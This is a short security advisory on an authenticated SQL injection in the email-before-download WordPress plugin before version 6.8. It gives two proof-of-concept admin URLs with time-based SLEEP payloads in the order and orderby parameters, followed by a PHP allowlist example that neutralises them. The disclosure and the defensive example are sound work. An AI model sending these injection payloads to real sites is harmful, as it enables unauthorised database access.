The plugin does not properly validate and escape the order and orderby GET parameters before using them in SQL statements, leading to authenticated SQL injection issues.
https://example.com/wp-admin/admin.php?page=email-before-download-links&order=desc&orderby=time_requested+AND+(SELECT+1554+FROM+(SELECT(SLEEP(5)))gPZH)

https://example.com/wp-admin/admin.php?page=email-before-download-links&orderby=time_requested&order=+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)
CPE

Name | Operator | Version |
---|---|---|
email-before-download | lt | 6.8 |
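
One way to handle the order and orderby parameters described above, as an added example (not the plugin's code and not its actual fix): both values are mapped onto an allowlist, so the request only selects among fixed strings and never contributes SQL text. The function name and every column other than time_requested are assumptions.

```php
<?php
// Added example: allowlist validation for ORDER BY inputs. Not the plugin's code.

// Assumption: sortable columns of the links table. Only time_requested
// appears in the advisory; 'email' and 'id' are hypothetical.
const EBD_SORTABLE_COLUMNS = ['time_requested', 'email', 'id'];
const EBD_DEFAULT_COLUMN   = 'time_requested';

/**
 * Build an ORDER BY clause from untrusted request parameters.
 * The returned SQL is assembled only from allowlisted constants.
 */
function ebd_order_clause(array $params): string
{
    $orderby = $params['orderby'] ?? EBD_DEFAULT_COLUMN;
    $order   = $params['order'] ?? 'desc';

    // Exact, strict match against the allowlist. Array input such as
    // orderby[]=x fails is_string() and falls back to the default.
    if (!is_string($orderby) || !in_array($orderby, EBD_SORTABLE_COLUMNS, true)) {
        $orderby = EBD_DEFAULT_COLUMN;
    }

    // Direction is reduced to one of two keywords; anything else is DESC.
    $direction = (is_string($order) && strtolower($order) === 'asc') ? 'ASC' : 'DESC';

    return sprintf('ORDER BY `%s` %s', $orderby, $direction);
}

// Constructed sample requests: one legitimate sort, the two query strings
// from the proof-of-concept URLs above, and an array-typed parameter.
$samples = [
    'order=asc&orderby=email',
    'order=desc&orderby=time_requested+AND+(SELECT+1554+FROM+(SELECT(SLEEP(5)))gPZH)',
    'orderby=time_requested&order=+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)',
    'orderby[]=email',
];

foreach ($samples as $qs) {
    parse_str($qs, $params);
    echo ebd_order_clause($params), PHP_EOL;
}
```

Only the first sample changes the sort; the other three fall back to the default column and direction because their values match no allowlist entry.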